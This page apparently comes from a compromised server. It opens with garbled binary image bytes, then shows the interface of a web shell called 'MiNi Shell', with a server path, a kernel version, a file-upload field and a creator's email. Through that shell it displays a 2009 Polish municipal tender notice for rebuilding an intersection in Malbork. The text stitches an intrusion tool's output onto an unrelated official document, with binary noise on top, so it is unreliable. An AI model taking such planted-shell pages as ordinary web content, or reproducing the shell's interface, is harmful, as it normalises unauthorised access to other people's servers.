JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090701/217928-N-2009.html

<p class="kh_header"><b>Malbork: Przebudowa skrzyżowania ulic Mickiewicza-Konopnickiej w Malborku</b><br>
<b>Numer ogłoszenia: 217928 - 2009; data zamieszczenia: 01.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Malborka , pl. Słowiański 5, 82-200 Malbork, woj. pomorskie, tel. 055 6473325, faks 055 6473324.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.malbork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa skrzyżowania ulic Mickiewicza-Konopnickiej w Malborku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przebudowa skrzyżowania ulic Mickiewicza, Konopnickiej i Sienkiewicza w Malborku wraz z przebudową uzbrojenia podziemnego.
  W ramach robót przewidzianych do realizacji wykonane zostaną   prace zgodnie z dokumentacją budowlaną załączoną do SIWZ w wersji pdf.
W zakres zamówienia wchodzą roboty :
1.1 Roboty drogowe   (zgodnie z dokumentacją budowlaną załączoną do SIWZ w wersji pdf)
       w tym:
rozebranie nawierzchni bitumicznych    o łącznej powierzchni 494,0 m2
rozebranie nawierzchni z kostki brukowej o łącznej powierzchni 471,0 m2
rozebranie chodników o łącznej powierzchni   1 500,0 m2
rozebranie krawężników i obrzeży o łacznej długości 1 370,0 mb
 ułożenie nawierzchni bitumicznych 3 095,0 m2 (w-wa wiażąca 0/16mm gr. 6 cm i w-wa ścieralna 0/12mm gr. 5cm)
ułożenie chodników z kostki bet. gr. 6 cm  1 326,0 m2
ułożenie kostki kamiennej 9/11 (pasy rozdziału)  259,0 m2
nawierzchnie z kostki bet. gr. 8 cm ( zjazdy )  513,0 m2
ułożenie krawężników betonowych 15x30 na ławie betonowej z oporem - 1121,0mb 
ułożenie obrzeży - 764,0 mb
oznakowanie poziome - 46,0 m2
1.2. Przebudowa sieci   oświetleniowej (zgodnie z dokumentacją budowlaną  załączoną do SIWZ w wersji pdf) m.in. demontaż starych i montaż nowych słupów oświetleniowych  w ilości 8 szt , demontaż starych kabli od 1-5,5 kg w ilości 612m, układanie kabli o ciężarach od 1 do 9 kg/m w ilości 654mb, rury osłonowe d-140mm w ilości 172mb.
1.3. Przebudowa sieci wod-kan.i gaz,   (zgodnie z dokumentacją budowlaną załączoną do SIWZ w wersji pdf) w tym m.in.:
        - sieć wodociągowa PE, PEHD średnic od 110 do 225mm o łącznej długości 443,7 mb z 
           przyłączami d-32 do 90mm długości 91,1m
        - sieć kanalizacji sanitarnej z rur kamionkowych d-200mm dł. 106,5m z przyłączami PVC 
          d-160 i 200 o łącznej długości 23,5m
        - sieć kanalizacji deszczowej PVC d-250 i 315mm dł. 76M z przyłączami d-200mm dł. 
           106,5m
         -  przebudowa sieci gazowej z rur HDPD d-40, 63, 110 i 160 długości łącznej 221m
1.4. Przebudowa sieci telekomunikacyjnych (kable i światłowody) nalezących do TP 
       S.A. Oraz Telefonii Dialog S.A. Z rozbiórką i budową studni  (zgodnie z  
       dokumentacją budowlaną załączoną  do SIWZ w wersji pdf)
1.5. Wykonanie nasadzeń zieleni (zgodnie z dokumentacją budowlaną załączoną do SIWZ w wersji pdf  
1.6. Wykonanie zieleni (zgodnie z dokumentacją budowlaną załączoną do SIWZ w wersji pdf  
1.7.Przygotowanie i uzgodnienie projektu organizacji ruchu  na czas budowy w rejonie wykonywanych robót i ulicach przyległych
1.8.Oznakowanie poziome i pionowe zgodnie z projektem organizacji ruchu na czas 
      wykonywania robót
1.9.Oznakowanie poziome i pionowe zgodnie z układem docelowym.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.10.00-5, 45.23.20.00-2, 45.23.30.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 50.000,00 zł     słownie: pięćdziesiąt tysięcy złotych 00-100.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu o zamówienie publiczne.

O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień; 
1.2	Posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania  zamówienia; 
1.3	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
 1.4	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

Warunki szczegółowe wymagane od wykonawców.
Wykonali w okresie ostatnich 3 lat minimum 2 zadania polegające na przebudowie dróg wraz przebudową uzbrojenia podziemnego na kwotę nie mniejszą jak 1,5 mln złotych   każde zadanie oraz posiadają referencje Inwestorów potwierdzające prawidłowe i terminowe wykonanie tych zadań.

2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne.

Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
   - nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w w ust. 1 pkt 1 do 4, 
   - nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art.   24 ust. 1 Prawa zamówień publicznych, 
   - wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji, 
   - złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania, 
   - nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3, 	
   - nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą, 
3. Zamawiający odrzuca ofertę wykonawcy jeżeli:
  - jest niezgodna z ustawą 
  -  jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, 
  - jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, 
  - zawierającą rażąco niską cenę w stosunku do przedmiotu zamówienia,  
  - została złożona przez wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert, 
  - zawiera błędy w obliczeniu ceny 
  - wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie 
    omyłki, o której mowa w art. 87 ust. 2 pkt 3,
  - jest nieważna na podstawie odrębnych przepisów,.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych składa następujące dokumenty:
   A.1) Druk oferty - z wykorzystaniem wzoru załącznik nr 1.  
   A.2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.  
  A.3) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających wniosek o dopuszczenie do udziału w postępowaniu oraz ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.  
   A.4) Aktualne zaświadczenie właściwego   urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.  
   A.5) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych - z wykorzystaniem wzoru załącznik nr 2   
   A.6) Wykaz osób  kierujących wykonaniem zamówienia  - kierownik budowy, kierownicy robót ( dotyczy to także podwykonawców ),  które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z podaniem informacji o ich kwalifikacjach niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności z wykorzystaniem wzoru załącznika nr 3  do SIWZ potwierdzonych niezbędnymi w realizacji niniejszego zamówienia uprawnieniami do sprawowania samodzielnych funkcji technicznych w budownictwie (kserokopie uprawnień odpowiednich do zakresu )  oraz aktualne zaświadczenia tych osób o przynależności do Polskiej Izby Inżynierów Budownictwa 

B.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
  B.1) Wykaz wykonanych robót budowlanych w okresie ostatnich 5 latach przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem   robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie (referencje) - z wykorzystaniem wzoru załącznik nr 4 (wykonanie w okresie ostatnich 3 lat min. 2 robót o porównywalnym  charakterze i zakresie robót  - załączyć referencje Inwestorów potwierdzające prawidłowe, terminowe i zgodne z jakością wykonanie tych robót),    
  B.2) Wykaz podwykonawców, którzy będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat zakresu i wartości wykonywanych przez nich czynności z wykorzystaniem wzoru - załącznik nr 5.  
  B.3) Oświadczenie, że wykonawca zapoznał się z warunkami zamówienia i z załączonymi istotnymi postanowieniami do umowy ( zał. Nr 7 ) oraz, że przyjmuje ich treść bez żadnych zastrzeżeń - z wykorzystaniem wzoru załącznik nr 6
  B.4) Wypełniona  tabela elementów robót (załącznik nr 8). 
         Wybrany Wykonawca w dniu podpisania umowy złoży u Zamawiającego Kosztorysy szczegółowe na wszystkie elementy robót z cenami jednostkowymi.
  B.5)  harmonogram rzeczowo-finansowy określający propozycję zakresu i wartości prac do wykonania w poszczególnych miesiącach.

C.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:
  C.1) Rachunek zysków i strat   - za okres ostatnich 2 lat (2007-2008), a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.  
  C.2) Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającą prawidłowość prowadzenia rachunku , zdolność kredytową  i jego ewentualne obciążenie tytułami egzekucyjnymi, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
  C.3) -Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności minimum na kwotę 1.000.000,00 zł.  
UWAGA!!!
W przypadku uznania za najkorzystniejszą ofertę danego Wykonawcy, Wykonawca ten przed dniem podpisania umowy zobowiązany będzie do dostarczenia odrębnej umowy ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzenia działalności gospodarczej obejmującej zakres przedmiotowego zamówienia publicznego na kwotę 500.000,00 zł.

D. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
  D.1) Zamiast dokumentów, o których mowa w pkt. A.2), A.4), składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu 
  D.2) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. -D- zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. -D-.   

E. Dokumenty wymagane w przypadku składania oferty wspólnej: 
  - Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt.  A2;A4;A5; C1;C2  dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie   
  
Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę-osoby uprawnione do podpisania oferty z dopiskiem -za zgodność z oryginałem-.

Dokumenty sporządzone w języku obcym są składane przez wykonawcę wraz z tłumaczeniem na język polski, poświadczonym biegłego tłumacza..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.malbork.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Malborka, Plac Słowiański 5  pok. 217 (II piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2009 godzina 10:00, miejsce: Urząd Miasta Malborka, Plac Słowiański 5, 82-200  Malbork, 
Pokój nr 115 ( sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com